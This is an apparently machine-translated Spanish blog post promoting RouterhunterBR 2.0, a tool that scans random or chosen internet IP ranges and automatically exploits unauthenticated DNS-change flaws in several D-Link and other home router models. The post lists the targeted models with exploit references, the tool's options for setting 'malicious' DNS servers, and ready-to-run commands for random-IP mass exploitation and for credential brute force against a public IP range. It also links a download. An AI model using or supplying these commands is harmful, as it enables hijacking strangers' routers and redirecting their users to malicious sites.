Vistas de página en total

36668

lunes, 15 de febrero de 2016

Routerhunterbr automático 2.0 herramienta para probar... #Linux #RouterExploitation #RouterhunterBR

 El RouterhunterBR Que es una herramienta de seguridad automatizada encuentra vulnerabilidades y realiza pruebas en los routers y dispositivos vulnerables en Internet. El RouterhunterBR fue diseñado para funcionar a través de Internet en busca de pistas ips definidos o al azar con el fin de explotar de forma automática el DNSChanger la vulnerabilidad de los routers domésticos.
 
 El DNSChanger es un troyano capaz de dirigir peticiones de los usuarios a sitios ilegales. En la práctica, este malware tiene la capacidad de cambiar la configuración DNS de nuestra máquina de redirigir al usuario a sitios con fines maliciosos. Imagínese, por ejemplo, que su sistema está infectado con este malware, lo que podría ocurrir es que el usuario tenga acceso a un sitio en particular (por ejemplo. Facebook.com) puede ser enviada a un sitio web no solicitados y potencialmente ilegal.
 
   El guión explora cuatro vulnerabilidades en los routers
 Tech traslado ADSL Modem-Router 915 WM / sin autenticar DNS remoto Cambio Exploitreference: http://www.exploit-db.com/exploits/35995/
 D-Link DSL-2740R / sin autenticar DNS remoto Cambio Exploitreference: http://www.exploit-db.com/exploits/35917/
 D-Link DSL-2640B sin autenticar DNS remoto Cambio Exploitreference: http://1337day.com/exploit/23302/
 D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change
reference: https://www.exploit-db.com/exploits/37237/
 D-Link DSL-2730B AU_2.01 - omisión de autenticación de DNS Changereference: https://www.exploit-db.com/exploits/37240/
 D-Link DSL-526B ADSL2 AU_2.01 - No autenticado Changereference DNS remoto: https://www.exploit-db.com/exploits/37241/
 routers autenticados - - DSLink 260E DNS Changer - bruteforce de referencia: https://www.youtube.com/watch?v=tNjy91g2Rakhttp://blog.inurl.com.br/2015/03/dslink-260e-defaut-passwords-dns-change_17.html
 

 requerimiento

import sys, os, argparse, itertools, requests, random, time, threading, base64, socket
from datetime import datetime
 
 

Uso

 

-range 192.168.1.0-255, --range 192.168.1.0-255  Set range of IP
  -bruteforce, --bruteforce                        Performs brute force with users and passwords standards, and soon    after defines the malicious DNS.
  -startip 192.168.*.*, --startip 192.168.*.*      Start - IP range customized with wildcard / 201.*.*.*
  -endip 192.168.*.*, --endip 192.168.*.*          End - IP range customized with wildcard / 201.*.*.*
  -dns1 8.8.8.8, --dns1 8.8.8.8                    Define malicious dns1
  -dns2 8.8.4.4, --dns2 8.8.4.4                    Define malicious dns2
  --threads 10                                     Set threads numbers
  -rip, --randomip                                 Randomizing ips routers
  -lmtip 10, --limitip 10                          Define limite random ip
 
 

 comandos

   ips al azar 

 

python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --randomip --limitip 10 --threads 10                      
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 -rip -lmtip 10 --threads 10
 
   Escáner de IP gama: 
 
 python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --range 192.168.25.0-255 --threads 10
 
   rango de IP para requisitos particulares con comodín / Ex: --startip 201 * * * - --endip 201 * * *...... 
 python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --startip 192.168.*.* --endip 192.168.*.* --threads 10
 
   La fuerza bruta con usuarios y contraseñas en los routers que requiere
 autenticación, obligando a la alteración de DNS - DSLink 260E.
 
 python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.4 --range 177.106.19.65-70 --bruteforce --threads 10
 
 
                              Download RouterhunterBR 2.0 
 

No hay comentarios:

Publicar un comentario